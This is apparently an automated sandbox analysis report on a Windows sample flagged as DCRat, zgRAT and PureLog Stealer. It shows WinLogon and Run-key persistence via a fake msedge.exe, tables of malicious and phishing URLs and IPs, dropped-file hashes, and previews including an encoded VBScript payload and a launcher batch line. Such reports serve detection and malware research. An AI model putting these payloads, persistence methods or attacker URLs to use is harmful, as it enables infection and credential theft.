                                                                                                                                                                    18:26:35AutostartRun: HKLM64\Software\Microsoft\Windows\CurrentVersion\Run msedge "C:\Edge\msedge.exe"
                                                                                                                                                                    18:26:52AutostartRun: WinLogon Shell "C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exe"
                                                                                                                                                                    18:27:00AutostartRun: WinLogon Shell "C:\Edge\msedge.exe"
                                                                                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                    188.114.96.3docs.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                    • www.j88.travel/c24t/?I6=iDjdFciE5wc5h9D9V74ZS/2sliUdDJEhqWnTSCKxgeFtQoD7uajT9bZ2+la3znjNy02hfQbCEg==&AL0=9rN46F
                                                                                                                                                                    https://wwvmicrosx.live/office365/office_cookies/mainGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                    • wwvmicrosx.live/office365/office_cookies/main/
                                                                                                                                                                    http://fitur-dana-terbaru-2024.pages.dev/Get hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                    • fitur-dana-terbaru-2024.pages.dev/favicon.ico
                                                                                                                                                                    http://mobilelegendsmycode.com/Get hashmaliciousUnknownBrowse
                                                                                                                                                                    • mobilelegendsmycode.com/favicon.ico
                                                                                                                                                                    http://instructionhub.net/?gad_source=2&gclid=EAIaIQobChMI-pqSm7HgiAMVbfB5BB3YEjS_EAAYASAAEgJAAPD_BwEGet hashmaliciousWinSearchAbuseBrowse
                                                                                                                                                                    • download.all-instructions.com/Downloads/Instruction%2021921.pdf.lnk
                                                                                                                                                                    ADNOC requesting RFQ.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                    • www.chinaen.org/zi4g/
                                                                                                                                                                    http://twint.ch-daten.com/de/receive/bank/sgkb/79469380Get hashmaliciousUnknownBrowse
                                                                                                                                                                    • twint.ch-daten.com/socket.io/?EIO=4&transport=polling&t=P8hxwsc
                                                                                                                                                                    Cbequipment-Voice Audio Interface.pdfGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                    • www.444317.com/
                                                                                                                                                                    Sept order.docGet hashmaliciousFormBookBrowse
                                                                                                                                                                    • www.rajalele.xyz/bopi/?1b=1soTE/gd/ZpFZmuHMdkP9CmM1erq3xsEeOQ9nFH+Tv+qMlBfxeqrLL5BDR/2l62DivVTHQ==&BfL=LxlT-
                                                                                                                                                                    1e#U0414.exeGet hashmaliciousLokibotBrowse
                                                                                                                                                                    • dddotx.shop/Mine/PWS/fre.php
                                                                                                                                                                    104.102.49.254http://gtm-cn-j4g3qqvf603.steamproxy1.com/Get hashmaliciousUnknownBrowse
                                                                                                                                                                    • www.valvesoftware.com/legal.htm
                                                                                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                    steamcommunity.comUY9hUZn4CQ.exeGet hashmaliciousLummaC, DCRat, LummaC Stealer, PureLog Stealer, zgRATBrowse
                                                                                                                                                                    • 104.102.49.254
                                                                                                                                                                    gh3zRWl4or.exeGet hashmaliciousLummaC, DCRat, LummaC Stealer, PureLog Stealer, zgRATBrowse
                                                                                                                                                                    • 104.102.49.254
                                                                                                                                                                    seoI30IZZr.exeGet hashmaliciousLummaC, DCRat, LummaC Stealer, PureLog Stealer, zgRATBrowse
                                                                                                                                                                    • 104.102.49.254
                                                                                                                                                                    file.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                                                                                                                                                                    • 104.102.49.254
                                                                                                                                                                    file.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                    • 104.102.49.254
                                                                                                                                                                    file.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                                                                                                                                                                    • 104.102.49.254
                                                                                                                                                                    file.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                                                                                                                                                                    • 104.102.49.254
                                                                                                                                                                    file.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                                                                                                                                                                    • 104.102.49.254
                                                                                                                                                                    file.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                                                                                                                                                                    • 104.102.49.254
                                                                                                                                                                    https://downcheck.nyc3.cdn.digitaloceanspaces.com/peltgon.zipGet hashmaliciousLummaCBrowse
                                                                                                                                                                    • 104.102.49.254
                                                                                                                                                                    offeviablwke.siteUY9hUZn4CQ.exeGet hashmaliciousLummaC, DCRat, LummaC Stealer, PureLog Stealer, zgRATBrowse
                                                                                                                                                                    • 172.67.197.40
                                                                                                                                                                    file.gardenUY9hUZn4CQ.exeGet hashmaliciousLummaC, DCRat, LummaC Stealer, PureLog Stealer, zgRATBrowse
                                                                                                                                                                    • 188.114.97.3
                                                                                                                                                                    4sTTCruY06.exeGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                    • 188.114.96.3
                                                                                                                                                                    gh3zRWl4or.exeGet hashmaliciousLummaC, DCRat, LummaC Stealer, PureLog Stealer, zgRATBrowse
                                                                                                                                                                    • 188.114.96.3
                                                                                                                                                                    seoI30IZZr.exeGet hashmaliciousLummaC, DCRat, LummaC Stealer, PureLog Stealer, zgRATBrowse
                                                                                                                                                                    • 188.114.96.3
                                                                                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                    CLOUDFLARENETUShttps://mafanikiosacco-my.sharepoint.com/:f:/p/info/EgPH1s54501Ki8NU-gutZLABOsAyZ-dhIPJaM6vWEXJqUQ?e=PJpX12Get hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                    • 188.114.96.3
                                                                                                                                                                    UY9hUZn4CQ.exeGet hashmaliciousLummaC, DCRat, LummaC Stealer, PureLog Stealer, zgRATBrowse
                                                                                                                                                                    • 104.21.1.169
                                                                                                                                                                    4sTTCruY06.exeGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                    • 188.114.96.3
                                                                                                                                                                    gh3zRWl4or.exeGet hashmaliciousLummaC, DCRat, LummaC Stealer, PureLog Stealer, zgRATBrowse
                                                                                                                                                                    • 188.114.96.3
                                                                                                                                                                    seoI30IZZr.exeGet hashmaliciousLummaC, DCRat, LummaC Stealer, PureLog Stealer, zgRATBrowse
                                                                                                                                                                    • 188.114.96.3
                                                                                                                                                                    docs.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                    • 188.114.96.3
                                                                                                                                                                    https://myworkspace183015a0ec.myclickfunnels.com/reviewdoc--96b32?preview=trueGet hashmaliciousUnknownBrowse
                                                                                                                                                                    • 104.18.35.212
                                                                                                                                                                    https://mandrillapp.com/track/click/30481271/www.doku.com?p=eyJzIjoibU5DZVhaM2w5MjJrQzZUaXptdlBXY2VNN2VnIiwidiI6MSwicCI6IntcInVcIjozMDQ4MTI3MSxcInZcIjoxLFwidXJsXCI6XCJodHRwczpcXFwvXFxcL3d3dy5kb2t1LmNvbVxcXC91XFxcL01PMjI3cXdcIixcImlkXCI6XCIxZjY5Nzc3NzBlZjU0NTg3OThmOTMwN2YyMzc5Y2VlOFwiLFwidXJsX2lkc1wiOltcImZiY2Y5N2U4ZWY0YzlkODk1Y2MxMGM4Y2YzYTdkZjc5YzU2NzU4MTlcIl19In0Get hashmaliciousUnknownBrowse
                                                                                                                                                                    • 1.1.1.1
                                                                                                                                                                    https://vh.gskoffihoura.com/okta.vailhealth.org/oauth2/v1/authorize&client_id=okta-2b1959c8-bcc0-56ebGet hashmaliciousUnknownBrowse
                                                                                                                                                                    • 1.1.1.1
                                                                                                                                                                    https://vh.gskoffihoura.com/okta.vailhealth.org/oauth2/v1/authorize&client_id=okta-2b1959c8-bcc0-56ebGet hashmaliciousUnknownBrowse
                                                                                                                                                                    • 1.1.1.1
                                                                                                                                                                    CLOUDFLARENETUShttps://mafanikiosacco-my.sharepoint.com/:f:/p/info/EgPH1s54501Ki8NU-gutZLABOsAyZ-dhIPJaM6vWEXJqUQ?e=PJpX12Get hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                    • 188.114.96.3
                                                                                                                                                                    UY9hUZn4CQ.exeGet hashmaliciousLummaC, DCRat, LummaC Stealer, PureLog Stealer, zgRATBrowse
                                                                                                                                                                    • 104.21.1.169
                                                                                                                                                                    4sTTCruY06.exeGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                    • 188.114.96.3
                                                                                                                                                                    gh3zRWl4or.exeGet hashmaliciousLummaC, DCRat, LummaC Stealer, PureLog Stealer, zgRATBrowse
                                                                                                                                                                    • 188.114.96.3
                                                                                                                                                                    seoI30IZZr.exeGet hashmaliciousLummaC, DCRat, LummaC Stealer, PureLog Stealer, zgRATBrowse
                                                                                                                                                                    • 188.114.96.3
                                                                                                                                                                    docs.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                    • 188.114.96.3
                                                                                                                                                                    https://myworkspace183015a0ec.myclickfunnels.com/reviewdoc--96b32?preview=trueGet hashmaliciousUnknownBrowse
                                                                                                                                                                    • 104.18.35.212
                                                                                                                                                                    https://mandrillapp.com/track/click/30481271/www.doku.com?p=eyJzIjoibU5DZVhaM2w5MjJrQzZUaXptdlBXY2VNN2VnIiwidiI6MSwicCI6IntcInVcIjozMDQ4MTI3MSxcInZcIjoxLFwidXJsXCI6XCJodHRwczpcXFwvXFxcL3d3dy5kb2t1LmNvbVxcXC91XFxcL01PMjI3cXdcIixcImlkXCI6XCIxZjY5Nzc3NzBlZjU0NTg3OThmOTMwN2YyMzc5Y2VlOFwiLFwidXJsX2lkc1wiOltcImZiY2Y5N2U4ZWY0YzlkODk1Y2MxMGM4Y2YzYTdkZjc5YzU2NzU4MTlcIl19In0Get hashmaliciousUnknownBrowse
                                                                                                                                                                    • 1.1.1.1
                                                                                                                                                                    https://vh.gskoffihoura.com/okta.vailhealth.org/oauth2/v1/authorize&client_id=okta-2b1959c8-bcc0-56ebGet hashmaliciousUnknownBrowse
                                                                                                                                                                    • 1.1.1.1
                                                                                                                                                                    https://vh.gskoffihoura.com/okta.vailhealth.org/oauth2/v1/authorize&client_id=okta-2b1959c8-bcc0-56ebGet hashmaliciousUnknownBrowse
                                                                                                                                                                    • 1.1.1.1
                                                                                                                                                                    AKAMAI-ASUSUY9hUZn4CQ.exeGet hashmaliciousLummaC, DCRat, LummaC Stealer, PureLog Stealer, zgRATBrowse
                                                                                                                                                                    • 104.102.49.254
                                                                                                                                                                    gh3zRWl4or.exeGet hashmaliciousLummaC, DCRat, LummaC Stealer, PureLog Stealer, zgRATBrowse
                                                                                                                                                                    • 104.102.49.254
                                                                                                                                                                    seoI30IZZr.exeGet hashmaliciousLummaC, DCRat, LummaC Stealer, PureLog Stealer, zgRATBrowse
                                                                                                                                                                    • 104.102.49.254
                                                                                                                                                                    https://mandrillapp.com/track/click/30481271/www.doku.com?p=eyJzIjoibU5DZVhaM2w5MjJrQzZUaXptdlBXY2VNN2VnIiwidiI6MSwicCI6IntcInVcIjozMDQ4MTI3MSxcInZcIjoxLFwidXJsXCI6XCJodHRwczpcXFwvXFxcL3d3dy5kb2t1LmNvbVxcXC91XFxcL01PMjI3cXdcIixcImlkXCI6XCIxZjY5Nzc3NzBlZjU0NTg3OThmOTMwN2YyMzc5Y2VlOFwiLFwidXJsX2lkc1wiOltcImZiY2Y5N2U4ZWY0YzlkODk1Y2MxMGM4Y2YzYTdkZjc5YzU2NzU4MTlcIl19In0Get hashmaliciousUnknownBrowse
                                                                                                                                                                    • 104.102.35.2
                                                                                                                                                                    http://tr.padlet.com/redirect/?url=http://dctools.mooo.com/smileyes/dhe/succes/pure/dad/mom/kid/she/qwerty/careese.pfund@stcotterturbine.comGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                    • 173.223.116.167
                                                                                                                                                                    Xkci1BfrmX.lnkGet hashmaliciousLonePageBrowse
                                                                                                                                                                    • 23.56.162.185
                                                                                                                                                                    Snc2ZNvAZP.pdfGet hashmaliciousUnknownBrowse
                                                                                                                                                                    • 23.56.162.185
                                                                                                                                                                    Purchase Order IBT LPO-2320.emlGet hashmaliciousUnknownBrowse
                                                                                                                                                                    • 23.56.162.185
                                                                                                                                                                    SCAN_Client_No_XP9739270128398468932393.pdfGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                    • 96.17.64.189
                                                                                                                                                                    file.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                                                                                                                                                                    • 104.102.49.254
                                                                                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                    74954a0c86284d0d6e1c4efefe92b521UY9hUZn4CQ.exeGet hashmaliciousLummaC, DCRat, LummaC Stealer, PureLog Stealer, zgRATBrowse
                                                                                                                                                                    • 188.114.96.3
                                                                                                                                                                    4sTTCruY06.exeGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                    • 188.114.96.3
                                                                                                                                                                    Cr4745ElZg.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                                                                                                                    • 188.114.96.3
                                                                                                                                                                    gh3zRWl4or.exeGet hashmaliciousLummaC, DCRat, LummaC Stealer, PureLog Stealer, zgRATBrowse
                                                                                                                                                                    • 188.114.96.3
                                                                                                                                                                    seoI30IZZr.exeGet hashmaliciousLummaC, DCRat, LummaC Stealer, PureLog Stealer, zgRATBrowse
                                                                                                                                                                    • 188.114.96.3
                                                                                                                                                                    file.exeGet hashmaliciousAmadey, BitCoin Miner, SilentXMRMinerBrowse
                                                                                                                                                                    • 188.114.96.3
                                                                                                                                                                    file.exeGet hashmaliciousLummaC, Amadey, CryptOne, LummaC Stealer, PureLog Stealer, RedLine, StealcBrowse
                                                                                                                                                                    • 188.114.96.3
                                                                                                                                                                    Setup_10024.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                    • 188.114.96.3
                                                                                                                                                                    ha9wYxkNI7.lnkGet hashmaliciousXWormBrowse
                                                                                                                                                                    • 188.114.96.3
                                                                                                                                                                    9KO1ScZ376.lnkGet hashmaliciousXWormBrowse
                                                                                                                                                                    • 188.114.96.3
                                                                                                                                                                    a0e9f5d64349fb13191bc781f81f42e1UY9hUZn4CQ.exeGet hashmaliciousLummaC, DCRat, LummaC Stealer, PureLog Stealer, zgRATBrowse
                                                                                                                                                                    • 104.102.49.254
                                                                                                                                                                    • 104.21.84.213
                                                                                                                                                                    gh3zRWl4or.exeGet hashmaliciousLummaC, DCRat, LummaC Stealer, PureLog Stealer, zgRATBrowse
                                                                                                                                                                    • 104.102.49.254
                                                                                                                                                                    • 104.21.84.213
                                                                                                                                                                    seoI30IZZr.exeGet hashmaliciousLummaC, DCRat, LummaC Stealer, PureLog Stealer, zgRATBrowse
                                                                                                                                                                    • 104.102.49.254
                                                                                                                                                                    • 104.21.84.213
                                                                                                                                                                    OCYe9qcxiM.exeGet hashmaliciousSmokeLoaderBrowse
                                                                                                                                                                    • 104.102.49.254
                                                                                                                                                                    • 104.21.84.213
                                                                                                                                                                    file.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                                                                                                                                                                    • 104.102.49.254
                                                                                                                                                                    • 104.21.84.213
                                                                                                                                                                    file.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                    • 104.102.49.254
                                                                                                                                                                    • 104.21.84.213
                                                                                                                                                                    file.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                                                                                                                                                                    • 104.102.49.254
                                                                                                                                                                    • 104.21.84.213
                                                                                                                                                                    file.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                                                                                                                                                                    • 104.102.49.254
                                                                                                                                                                    • 104.21.84.213
                                                                                                                                                                    PO554830092024.xlsGet hashmaliciousUnknownBrowse
                                                                                                                                                                    • 104.102.49.254
                                                                                                                                                                    • 104.21.84.213
                                                                                                                                                                    PI#0034250924.xla.xlsxGet hashmaliciousUnknownBrowse
                                                                                                                                                                    • 104.102.49.254
                                                                                                                                                                    • 104.21.84.213
                                                                                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                    C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exeUY9hUZn4CQ.exeGet hashmaliciousLummaC, DCRat, LummaC Stealer, PureLog Stealer, zgRATBrowse
                                                                                                                                                                      gh3zRWl4or.exeGet hashmaliciousLummaC, DCRat, LummaC Stealer, PureLog Stealer, zgRATBrowse
                                                                                                                                                                        seoI30IZZr.exeGet hashmaliciousLummaC, DCRat, LummaC Stealer, PureLog Stealer, zgRATBrowse
                                                                                                                                                                          C:\Edge\msedge.exeUY9hUZn4CQ.exeGet hashmaliciousLummaC, DCRat, LummaC Stealer, PureLog Stealer, zgRATBrowse
                                                                                                                                                                            gh3zRWl4or.exeGet hashmaliciousLummaC, DCRat, LummaC Stealer, PureLog Stealer, zgRATBrowse
                                                                                                                                                                              seoI30IZZr.exeGet hashmaliciousLummaC, DCRat, LummaC Stealer, PureLog Stealer, zgRATBrowse
                                                                                                                                                                                C:\Users\user\Desktop\DqsZwsEl.log7NrGfIpGYi.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                                                                                                                                  mqJJr1R3v4.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                                                                                                                                    UY9hUZn4CQ.exeGet hashmaliciousLummaC, DCRat, LummaC Stealer, PureLog Stealer, zgRATBrowse
                                                                                                                                                                                      Cr4745ElZg.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                                                                                                                                        gh3zRWl4or.exeGet hashmaliciousLummaC, DCRat, LummaC Stealer, PureLog Stealer, zgRATBrowse
                                                                                                                                                                                          seoI30IZZr.exeGet hashmaliciousLummaC, DCRat, LummaC Stealer, PureLog Stealer, zgRATBrowse
                                                                                                                                                                                            0d145776475200f49119bfb3ac7ac4dd4e20fadd0fd7b.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                                                                                                                                              e416c0d0e2c49f0d5582d90727781330a012ebe541a60.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                                                                                                                                                p3f932IsTO.exeGet hashmaliciousDCRatBrowse
                                                                                                                                                                                                  UpU2O6YQxG.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                                                                                                                                                    Process:C:\Edge\msedge.exe
                                                                                                                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):230
                                                                                                                                                                                                    Entropy (8bit):5.681618711739239
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:6:C4yC84Ngn2pMUQd7G4ZKbIjTt2h339v5WcIN8FbrH:py/4N9MUQZZ31Yv5WKFbrH
                                                                                                                                                                                                    MD5:AE3EC2BFD652A88AF6AB5FF5786EC9D9
                                                                                                                                                                                                    SHA1:B96BF064B6A6A5E65B2231F937A74DA9375F8D1C
                                                                                                                                                                                                    SHA-256:B797B0034C505603624B3B17F6B414B449E76D8836A65F418E393384BD57EDB2
                                                                                                                                                                                                    SHA-512:9EEF24C9639F04A173ED7FF751983F4077608B38413F03D3F223D09F331EB00C7408AFB08648E180EA64FCA3254D1809288AB90085E4F66D5AB1A49D3E825EA0
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Preview:Ann1Sa8DTpC78u0EpaNQFcURYvAALmMz3xXIQ15LoDrxrSwbBlo2rMIhTWdha82rcMDLXrxyeCmBuhjF8j8k7UIrozz3YYvpLAVeOkDUx0XokGwwxXi09StHDWhh13ZGR6zuLE1YfowG6eGhDDGBz4p3QNb2Dfc3bRXoQCksfJUUfnLjP9eywXRXQ6d8n8VAM2ppHcQBdYfpjVXnC2mDAoHDA9XUimEhyUIm8g
                                                                                                                                                                                                    Process:C:\Windows\Speech\kdmapper.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):229
                                                                                                                                                                                                    Entropy (8bit):5.838240404374592
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:6:GbvwqK+NkLzWbHOurFnBaORbM5nCI7hHt16fIRVbbP:GKMCzWLOuhBaORbQCsHt1nDbP
                                                                                                                                                                                                    MD5:569A28CF34F3A51DB0CC4AA0369773EC
                                                                                                                                                                                                    SHA1:23488377EA3A37B61750952D541B867AB3D8B424
                                                                                                                                                                                                    SHA-256:86300641B7D7CF7227C163FB4CC84B0115875D923949E957B18EAED9847F0329
                                                                                                                                                                                                    SHA-512:3E7855DDA257477691618305B2979EB20D33FFBEBC8F614BE736D23482E49A04A1D0AE837789B3171575F96CB197DDA04A84BB284599E0E18769473594FF6051
                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                    Antivirus:
                                                                                                                                                                                                    • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                    Preview:#@~^zAAAAA==j.Y~q/4?t.V^~',Z.+mYn6(L+1O`r.?1.rwDRUtnVsE*@#@&.U^DbwO UV+n2vFX!ZT*@#@&U+DP.ktU4+^V~',Z.nmY+}8L.mYvE.?1DbwORj4.VsJ*@#@&q/4j4+Vs "EUPr/=z39o.zzsk0t6zWVK8YnfXrhj0kb.wl)/pjVSyr!9)jc#ZT%s1c-4TR4COr~~!B~6lsk+hkAAAA==^#~@.
                                                                                                                                                                                                    Process:C:\Windows\Speech\kdmapper.exe
                                                                                                                                                                                                    File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):70
                                                                                                                                                                                                    Entropy (8bit):4.968079981014333
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:3:cNjpJgFNeUpnbG0DLagi0m:U1ueUJbGwLBE
                                                                                                                                                                                                    MD5:68B1414DBD5A51F2F75912513D1A035E
                                                                                                                                                                                                    SHA1:A45E03F8EDADA7FDF3697EAA6D88785CD464D373
                                                                                                                                                                                                    SHA-256:48F984A346659261B6A2CFBDF6C558A09201EB4A0DBA69F56F7A403EA7B8EB9E
                                                                                                                                                                                                    SHA-512:AA4921FCAACEE5472C7BBAA7BD1ECCB837689F988650DCE644968D6CE422C9BB1D5B4D0304F0DD5C0D643E5B3CF1B65752B704528804AC24E5BFC38D5C1205FC
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Preview:%ZrAnvfoASNUfO%%CBvOlEkO%..%VxFgqUHpnZxb%"C:\Edge/msedge.exe"%oRfhCeQ%
                                                                                                                                                                                                    Process:C:\Windows\Speech\kdmapper.exe
                                                                                                                                                                                                    File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):1963008
                                                                                                                                                                                                    Entropy (8bit):7.552676792704024
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:24576:vCkLO8zb1Pp8jwaA/KdMg8NxAQv18Ys2sYjb1/k6cMhafck0UneKYXhZa2:zLLvax4Gmhscse1
                                                                                                                                                                                                    MD5:ABD343DF6FBD7334D617F76F6F050E3C
                                                                                                                                                                                                    SHA1:864A1DA1AF2E7B5049B8E7A93402D2BDED518681
                                                                                                                                                                                                    SHA-256:1B8125938BF1872C9589546DDF4DD17E765A351046AB7F2639540C77E38546BC
                                                                                                                                                                                                    SHA-512:56665FD2191C2A4FB1B6F624A49203AFBB1075F510C1420F51AB7AED82259192336C056E54DA63421467AC3822DB980EEC94CED7E962107E0F04ACCED7201660
                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                    Yara Hits:
                                                                                                                                                                                                    • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Edge\msedge.exe, Author: Joe Security
                                                                                                                                                                                                    • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Edge\msedge.exe, Author: Joe Security
                                                                                                                                                                                                    Antivirus:
                                                                                                                                                                                                    • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                    • Antivirus: ReversingLabs, Detection: 74%
                                                                                                                                                                                                    Joe Sandbox View:
                                                                                                                                                                                                    • Filename: UY9hUZn4CQ.exe, Detection: malicious, Browse
                                                                                                                                                                                                    • Filename: gh3zRWl4or.exe, Detection: malicious, Browse
                                                                                                                                                                                                    • Filename: seoI30IZZr.exe, Detection: malicious, Browse
                                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...w..f................................. ... ....@.. .......................`............@.................................`...K.... .. ....................@....................................................... ............... ..H............text........ ...................... ..`.rsrc... .... ......................@....reloc.......@......................@..B........................H.......`...............T...u)...........................................0..........(.... ........8........E....N.......)...*...8I...(.... ....~....{....:....& ....8....*(.... ....~....{....9....& ....8....(.... ....~....{....:....& ....8y......0.......... ........8........E............S...............8)...~....:.... ....~....{....:....& ....8.......... ....~....{....:....& ....8....~....(B... .... .... ....s....~....(F....... ....8Z...8.... ........8C...r...ps....z*....~....
                                                                                                                                                                                                    Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                                                                                                                                    File Type:MSVC .res
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):1168
                                                                                                                                                                                                    Entropy (8bit):4.448520842480604
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:24:mZxT0uZhNB+h9PNnqNdt4+lEbNFjMyi07:yuulB+hnqTSfbNtme
                                                                                                                                                                                                    MD5:B5189FB271BE514BEC128E0D0809C04E
                                                                                                                                                                                                    SHA1:5DD625D27ED30FCA234EC097AD66F6C13A7EDCBE
                                                                                                                                                                                                    SHA-256:E1984BA1E3FF8B071F7A320A6F1F18E1D5F4F337D31DC30D5BDFB021DF39060F
                                                                                                                                                                                                    SHA-512:F0FCB8F97279579BEB59F58EA89527EE0D86A64C9DE28300F14460BEC6C32DDA72F0E6466573B6654A1E992421D6FE81AE7CCE50F27059F54CF9FDCA6953602E
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Preview:.... ...........................D...<...............0...........D.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...8.....I.n.t.e.r.n.a.l.N.a.m.e...m.s.e.d.g.e...e.x.e.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...@.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...m.s.e.d.g.e...e.x.e.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0....................................<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0">.. <assemblyIdentity version="1.0.0.0" name="MyApplication.app"/>.. <trustInfo xmlns="urn:schemas-microsoft-com:asm.v2">.. <security>.. <requestedPrivileges xmlns="urn:schemas-micro
                                                                                                                                                                                                    Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                                                                                                                                    File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):4608
                                                                                                                                                                                                    Entropy (8bit):3.934941031819869
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:48:6omVtuxZ8RxeOAkFJOcV4MKe28dTuwUQPbvqBHfuulB+hnqXSfbNtm:KRxvxVx9GUvkxTkZzNt
                                                                                                                                                                                                    MD5:7E15916912CE8950AB28ECCD8BCCA89A
                                                                                                                                                                                                    SHA1:E5ECC977F23AA544DC90F2C3468C4784B2892345
                                                                                                                                                                                                    SHA-256:51F090E8335870816865CE0BBC4F6F7F6864B58A16B980257F2E1FCFD2D95BA0
                                                                                                                                                                                                    SHA-512:9B45A12086017BA3FE38E7C9B351F3D626F484B69295DD9D97BA1D6B5B33E3D57669C8EC7F87F1B6438C36FC680F134395472EADADAA067C38C4D94A89A42B10
                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                    Antivirus:
                                                                                                                                                                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...Z..f.............................'... ...@....@.. ....................................@.................................l'..O....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................'......H.......(!..D.............................................................(....*.0..!.......r...pr...p.{....(....(....&..&..*....................0..........r...p(....&..&..*....................0..K.......s.......}...........s....s....(....~....-........s.........~....s....(....*..(....*.BSJB............v4.0.30319......l.......#~..@.......#Strings............#US.........#GUID...$... ...#Blob...........WU........%3................................................................
                                                                                                                                                                                                    Process:C:\Edge\msedge.exe
                                                                                                                                                                                                    File Type:ASCII text, with very long lines (797), with no line terminators
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):797
                                                                                                                                                                                                    Entropy (8bit):5.908437100823228
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:12:JRHAf7LGNM1Azdp2SHvLX23uQAAnzCWDFltgOw8u08/v7mkz3bPBTVnLbywx37iv:JQ7yPv1Hz4ZzCeFrkzJzHfx376XNZ
                                                                                                                                                                                                    MD5:EEA1BCFF0FE03FEB7E5FEA5DD511092A
                                                                                                                                                                                                    SHA1:AD6ECE084F3E3F9273E2C7C053FCD0F74B170B43
